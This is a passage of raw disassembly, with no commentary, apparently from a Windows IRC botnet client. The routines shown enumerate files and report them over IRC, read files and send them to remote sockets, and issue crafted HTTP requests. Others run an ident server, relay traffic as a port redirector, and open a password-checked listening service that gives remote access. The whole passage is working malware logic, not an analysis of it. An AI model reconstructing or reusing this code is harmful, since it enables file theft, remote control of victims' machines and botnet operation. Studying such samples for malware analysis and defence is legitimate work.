lea eax, [ebp+var_248]
push eax ; Dest
call __snprintf
add esp, 18h
loc_4109C5: ; CODE XREF: sub_410423+444�j
; sub_410423+483�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
cmp [ebp+arg_8], ebx
jz short loc_4109F4
push 7D0h
call ds:dword_4F6380 ; Sleep
loc_4109F4: ; CODE XREF: sub_410423+22B�j
; sub_410423+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+Str]
call ds:dword_4F6420 ; FindNextFileA
test eax, eax
jnz loc_410648
loc_410A0C: ; CODE XREF: sub_410423+21A�j
push [ebp+Str]
call ds:dword_4F6414 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_410A4F
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_4174C3
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_4174C3
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_410A83
; ---------------------------------------------------------------------------
loc_410A4F: ; CODE XREF: sub_410423+5F5�j
cmp [ebp+Source], ebx
jz short loc_410A69
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_410A83
; ---------------------------------------------------------------------------
loc_410A69: ; CODE XREF: sub_410423+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax ; Dest
call _sprintf
add esp, 10h
loc_410A83: ; CODE XREF: sub_410423+62A�j
; sub_410423+644�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_410423 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410AA9 proc near ; CODE XREF: sub_40FFE9+13C�p
Dst = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_4F63F4 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410B61
push esi
push ebx
call ds:dword_4F6410 ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_410B5A
loc_410AEE: ; CODE XREF: sub_410AA9+AF�j
push 400h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_410B0B
mov edi, [ebp+arg_4]
loc_410B0B: ; CODE XREF: sub_410AA9+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_4F6428 ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Dst]
push edi
push eax
push ebx
call ds:dword_4F63F0 ; ReadFile
push esi
lea eax, [ebp+Dst]
push edi
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_410B55
call dword_4E41B4 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_410B5A
xor eax, eax
loc_410B55: ; CODE XREF: sub_410AA9+9B�j
sub [ebp+arg_4], eax
jnz short loc_410AEE
loc_410B5A: ; CODE XREF: sub_410AA9+43�j
; sub_410AA9+A8�j
push ebx
call ds:dword_4F6370 ; CloseHandle
loc_410B61: ; CODE XREF: sub_410AA9+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_410AA9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_410B66(char *Str)
sub_410B66 proc near ; CODE XREF: sub_41016C+181�p
Str = dword ptr 4
push esi
push edi
mov edi, [esp+8+Str]
xor esi, esi
push edi ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_410B8F
loc_410B79: ; CODE XREF: sub_410B66+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_410B83
mov byte ptr [esi+edi], 2Fh
loc_410B83: ; CODE XREF: sub_410B66+17�j
push edi ; Str
inc esi
call _strlen
cmp esi, eax
pop ecx
jb short loc_410B79
loc_410B8F: ; CODE XREF: sub_410B66+11�j
mov eax, edi
pop edi
pop esi
retn
sub_410B66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410B94(int,char *Str,int,int,int,int,int,int,int)
sub_410B94 proc near ; CODE XREF: sub_401CC7+53E7�p
var_4A0 = byte ptr -4A0h
Dest = byte ptr -310h
Format = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_4E4190 ; WSAStartup
push 6
push 1
push 2
call dword_4E42A0 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_14]
call dword_4E4220 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40AE8D
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_410C71
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_410C0D
mov eax, offset dword_4E6FB0
loc_410C0D: ; CODE XREF: sub_410B94+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+Format]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Format]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Format]
push eax
push ebx
call dword_4E4270 ; send
push esi ; Size
lea eax, [ebp+Format]
push edi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+Format]
push edi
push esi
push eax
push ebx
call dword_4E4238 ; recv
pop esi
loc_410C71: ; CODE XREF: sub_410B94+6B�j
push ebx
call dword_4E42B8 ; closesocket
call dword_4E4178 ; WSACleanup
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_410CB1
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_410CB1: ; CODE XREF: sub_410B94+102�j
pop edi
pop ebx
leave
retn
sub_410B94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CB5 proc near ; DATA XREF: WinMain(x,x,x,x)+445�o
; sub_401CC7+43E6�o
Str = byte ptr -238h
Dest = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_8], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 71h
call dword_4E4220 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call dword_4E42A0 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410E19
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov dword_457134[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4E424C ; bind
cmp eax, 0FFFFFFFFh
jz loc_410E19
push 5
push ebx
call dword_4E4248 ; listen
cmp eax, 0FFFFFFFFh
jz loc_410E19
mov [ebp+var_C], edi
mov edi, 200h
loc_410D40: ; CODE XREF: sub_410CB5+EA�j
; sub_410CB5+14D�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call dword_4E42B4 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_410E14
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Str]
push offset asc_44BF7C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_415C77
add esp, 14h
lea eax, [ebp+Str]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4E4238 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410D40
lea eax, [ebp+Str]
push esi ; int
push eax ; Str
call sub_418CD0
push 0Ch ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
push esi ; Str1
push esi ; int
lea eax, [ebp+Dest]
push 2 ; int
push eax ; Dest
call sub_40B487
add esp, 24h
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_4]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jz loc_410D40
mov [ebp+var_8], 1
jmp loc_410D40
; ---------------------------------------------------------------------------
loc_410E14: ; CODE XREF: sub_410CB5+A0�j
cmp [ebp+var_8], esi
jnz short loc_410E40
loc_410E19: ; CODE XREF: sub_410CB5+47�j
; sub_410CB5+6B�j ...
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Str]
push offset asc_44BFC0 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_415C77
add esp, 10h
loc_410E40: ; CODE XREF: sub_410CB5+162�j
push ebx
call dword_4E42B8 ; closesocket
push [ebp+var_4]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_410CB5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410E63 proc near ; DATA XREF: sub_401CC7+628D�o
Source = byte ptr -350h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 350h
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_150]
push 10h
rep movsd
pop edi
mov dword ptr [eax+120h], 1
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_44]
call dword_4E4220 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_4], edi
call dword_4E42A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410FCF
mov ecx, [ebp+var_40]
push 1
imul ecx, 234h
push 401h
push esi
push eax
mov dword_457134[ecx], eax
call dword_4E4130 ; WSAAsyncSelect
lea eax, [ebp+Dst]
push edi
push eax
push [ebp+arg_0]
call dword_4E424C ; bind
test eax, eax
jnz loc_410FCF
push 0Ah
push [ebp+arg_0]
call dword_4E4248 ; listen
test eax, eax
jnz loc_410FCF
loc_410F13: ; CODE XREF: sub_410E63+C6�j
; sub_410E63+147�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call dword_4E42B4 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_410F13
movzx eax, [ebp+var_26]
push [ebp+var_40]
mov [ebp+var_14C], edi
mov [ebp+var_30], esi
push eax
push [ebp+var_24]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44BFEC ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 18h ; int
push eax ; Source
call sub_40B78E
mov [ebp+var_3C], eax
imul eax, 234h
mov ecx, [ebp+var_40]
add esp, 20h
mov dword_45712C[eax], ecx
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_150]
push esi
push eax
push offset sub_410FF4
push esi
push esi
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_3C]
imul ecx, 234h
cmp eax, esi
mov dword_45713C[ecx], eax
jz short loc_410FBA
loc_410FA7: ; CODE XREF: sub_410E63+155�j
cmp [ebp+var_30], esi
jnz loc_410F13
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_410FA7
; ---------------------------------------------------------------------------
loc_410FBA: ; CODE XREF: sub_410E63+142�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C034 ; "-"
call sub_415CEB
pop ecx
pop ecx
jmp short loc_410FD2
; ---------------------------------------------------------------------------
loc_410FCF: ; CODE XREF: sub_410E63+63�j
; sub_410E63+97�j ...
mov edi, [ebp+arg_0]
loc_410FD2: ; CODE XREF: sub_410E63+16A�j
push edi
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call dword_4E42B8 ; closesocket
push [ebp+var_40]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_410E63 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410FF4 proc near ; DATA XREF: sub_410E63+124�o
var_1344 = byte ptr -1344h
Source = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
Dst = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_4E42A0 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_4111AA
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_4E4220 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_411084
lea eax, [ebp+var_13C]
push eax
call dword_4E42A4 ; gethostbyname
jmp short loc_411092
; ---------------------------------------------------------------------------
loc_411084: ; CODE XREF: sub_410FF4+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4E41D8 ; gethostbyaddr
loc_411092: ; CODE XREF: sub_410FF4+8E�j
cmp eax, edi
jz loc_4111AA
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+Dst]
push eax
push esi
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4111AA
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44C070 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Source]
push 18h ; int
push eax ; Source
call sub_40B78E
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_457134[ebx]
mov dword_45712C[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_457138[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_4111DB
push edi
push edi
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_45713C[ecx], eax
jz short loc_411197
loc_411144: ; CODE XREF: sub_410FF4+15D�j
cmp [ebp+var_20], edi
jnz short loc_411153
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_411144
; ---------------------------------------------------------------------------
loc_411153: ; CODE XREF: sub_410FF4+153�j
mov ebx, 1000h
loc_411158: ; CODE XREF: sub_410FF4+19F�j
push ebx ; Size
lea eax, [ebp+var_1344]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_4E4238 ; recv
cmp eax, edi
jle short loc_4111AA
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_411158
jmp short loc_4111AA
; ---------------------------------------------------------------------------
loc_411197: ; CODE XREF: sub_410FF4+14E�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C0B4 ; "-"
call sub_415CEB
pop ecx
pop ecx
loc_4111AA: ; CODE XREF: sub_410FF4+44�j
; sub_410FF4+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_457134[eax]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call dword_4E42B8 ; closesocket
push [ebp+var_4]
call sub_40BAAA
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_410FF4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111DB proc near ; DATA XREF: sub_410FF4+130�o
Dst = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_411212: ; CODE XREF: sub_4111DB+7C�j
push edi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 0
push edi
push eax
push dword_457138[esi]
call dword_4E4238 ; recv
test eax, eax
jle short loc_411259
push 0
push eax
lea eax, [ebp+Dst]
push eax
push dword_457134[esi]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_411212
loc_411259: ; CODE XREF: sub_4111DB+61�j
push dword_457138[esi]
call dword_4E42B8 ; closesocket
push [ebp+var_14]
call sub_40BAAA
pop ecx
push 0
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_4111DB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411278 proc near ; DATA XREF: sub_411506+1BE�o
var_3D4 = byte ptr -3D4h
Str1 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
Dest = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
Args = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_457134[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call dword_4E4208 ; select
test eax, eax
jnz short loc_4112FC
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_4112FC: ; CODE XREF: sub_411278+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call dword_4E4238 ; recv
lea eax, [ebp+Args]
push 10h
push eax
push dword ptr [esi]
call sub_41147D
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_41147D
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_41147D
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call dword_4E4174 ; getpeername
test eax, eax
jz short loc_411375
call dword_4E41B4 ; WSAGetLastError
push eax ; Args
push offset asc_44C0F4 ; "-"
call sub_415CEB
push [ebp+arg_0]
call sub_40BAAA
add esp, 0Ch
push edi
call ds:dword_4F63D4 ; ExitThread
loc_411375: ; CODE XREF: sub_411278+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call dword_4E41D8 ; gethostbyaddr
cmp eax, edi
jnz short loc_41139F
push [ebp+var_18]
call dword_4E42AC ; inet_ntoa
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
jmp short loc_4113AD
; ---------------------------------------------------------------------------
loc_41139F: ; CODE XREF: sub_411278+10D�j
push dword ptr [eax] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
loc_4113AD: ; CODE XREF: sub_411278+125�j
pop ecx
pop ecx
push edi
push ebx
push offset dword_4E6FC4
push dword ptr [esi]
call dword_4E4270 ; send
cmp dword_4E6FBC, edi
jnz short loc_41140F
push [ebp+var_18]
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Args]
push eax ; Args
call sub_4114D7
add esp, 10h
test eax, eax
jnz short loc_41140F
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call dword_4E4270 ; send
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_41140F: ; CODE XREF: sub_411278+14C�j
; sub_411278+16D�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset asc_44C134 ; "-"
call sub_415CEB
push [ebp+arg_0]
call sub_41178E
add esp, 10h
test eax, eax
jnz short loc_411456
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C15C ; "-"
call sub_415CEB
push [ebp+arg_0]
call sub_40BAAA
add esp, 0Ch
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_411456: ; CODE XREF: sub_411278+1B9�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset asc_44C188 ; "-"
call sub_415CEB
push [ebp+arg_0]
call sub_40BAAA
add esp, 10h
push edi
call ds:dword_4F63D4 ; ExitThread
sub_411278 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41147D proc near ; CODE XREF: sub_411278+9A�p
; sub_411278+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4E4238 ; recv
cmp eax, 1
jnz short loc_4114CD
mov esi, [ebp+arg_4]
loc_41149B: ; CODE XREF: sub_41147D+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_4114C2
test al, al
jz short loc_4114D1
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4E4238 ; recv
cmp eax, 1
jz short loc_41149B
jmp short loc_4114CD
; ---------------------------------------------------------------------------
loc_4114C2: ; CODE XREF: sub_41147D+27�j
push offset asc_44C1B4 ; "-"
call sub_415CEB
pop ecx
loc_4114CD: ; CODE XREF: sub_41147D+19�j
; sub_41147D+43�j
xor eax, eax
jmp short loc_4114D4
; ---------------------------------------------------------------------------
loc_4114D1: ; CODE XREF: sub_41147D+2B�j
push 1
pop eax
loc_4114D4: ; CODE XREF: sub_41147D+52�j
pop esi
leave
retn
sub_41147D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4114D7(char *Args,int,char *Str1)
sub_4114D7 proc near ; CODE XREF: sub_411278+163�p
Args = dword ptr 4
arg_4 = dword ptr 8
Str1 = dword ptr 0Ch
push [esp+Args] ; Str2
push [esp+4+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_411502
push [esp+arg_4]
push [esp+4+Args] ; Args
push offset dword_44C1E0 ; Format
call sub_415CEB
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_411502: ; CODE XREF: sub_4114D7+11�j
push 1
pop eax
retn
sub_4114D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411506 proc near ; DATA XREF: sub_401CC7+2394�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
Source = byte ptr -414h
var_214 = dword ptr -214h
Str = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call dword_4E4190 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_41155F
push eax ; Args
push offset asc_44C250 ; "-"
call sub_415CEB
push [ebp+var_4C]
call sub_40BAAA
add esp, 0Ch
push edi
call ds:dword_4F63D4 ; ExitThread
loc_41155F: ; CODE XREF: sub_411506+3A�j
push edi
push offset loc_411784
call ds:dword_4F642C ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_411598
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C27C ; "-"
call sub_415CEB
pop ecx
pop ecx
call dword_4E4178 ; WSACleanup
push [ebp+var_4C]
call sub_40BAAA
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_411598: ; CODE XREF: sub_411506+67�j
push ebx
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_50]
call dword_4E4220 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call dword_4E42A0 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_41170F
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov dword_457134[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4E424C ; bind
test eax, eax
jnz loc_41170F
push 7FFFFFFFh
push ebx
call dword_4E4248 ; listen
test eax, eax
jnz loc_41170F
push offset unk_44C2C0
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_415C77
pop ecx
mov [ebp+arg_0], edi
loc_411627: ; CODE XREF: sub_411506+15A�j
; sub_411506+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call dword_4E42B4 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_411712
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call dword_4E4200 ; setsockopt
